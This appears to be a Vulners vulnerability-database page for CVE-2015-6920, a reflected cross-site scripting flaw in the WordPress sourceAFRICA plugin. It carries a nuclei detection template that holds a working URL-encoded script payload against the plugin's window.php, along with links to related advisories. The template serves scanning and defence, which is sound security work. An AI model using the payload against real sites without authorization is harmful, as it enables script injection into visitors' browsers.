Lucene search
K

WordPress sourceAFRICA <=0.1.3 - Cross-Site Scripting

🗓️ 17 Jun 2026 05:14:44Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

WordPress sourceAFRICA plugin version 0.1.3 has Cross-Site Scripting vulnerability, upgrade to version 0.1.

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD
WordPress sourceAFRICA plugin cross-site scripting vulnerability
17 Sep 201500:00
cnvd
CVE
CVE-2015-6920
11 Sep 201520:00
cve
Cvelist
CVE-2015-6920
11 Sep 201520:00
cvelist
EUVD
EUVD-2015-6855
7 Oct 202500:30
euvd
NVD
CVE-2015-6920
11 Sep 201520:59
nvd
Patchstack
WordPress sourceAFRICA Plugin <= 0.1.3 - XSS
11 Sep 201500:00
patchstack
Prion
Cross site scripting
11 Sep 201520:59
prion
WPVulnDB
sourceAFRICA <= 0.1.3 - Unauthenticated Cross-Site Scripting (XSS)
1 Sep 201500:00
wpvulndb
id: CVE-2015-6920

info:
  name: WordPress sourceAFRICA <=0.1.3 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: WordPress sourceAFRICA plugin version 0.1.3 contains a cross-site scripting vulnerability.
  impact: |
    Attackers can execute malicious scripts in the victim's browser, potentially stealing cookies or session tokens.
  remediation: |
    Update to the latest version of the plugin where the vulnerability is fixed.
  reference:
    - http://packetstormsecurity.com/files/133371/WordPress-sourceAFRICA-0.1.3-Cross-Site-Scripting.html
    - https://wpvulndb.com/vulnerabilities/8169
    - https://nvd.nist.gov/vuln/detail/CVE-2015-6920
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2015-6920
    cwe-id: CWE-79
    epss-score: 0.03265
    epss-percentile: 0.86752
    cpe: cpe:2.3:a:sourceafrica_project:sourceafrica:0.1.3:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: "sourceafrica_project"
    product: sourceafrica
    framework: wordpress
  tags: cve2015,cve,wp-plugin,xss,packetstorm,wordpress,sourceafrica_project,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/sourceafrica/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'SourceAfrica'
          - 'Tags:'
        condition: and
        case-insensitive: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"></script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a004730450220252a8fffb9932432131deaccb8596186e0519ab7d970436a2717c7b96660ec93022100f1af6ca401d52c71481f0ff07d8b585177febab208bcdafcf61a162619d6969c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
4.8Medium risk
Vulners AI Score4.8
CVSS 24.3
EPSS0.03265
13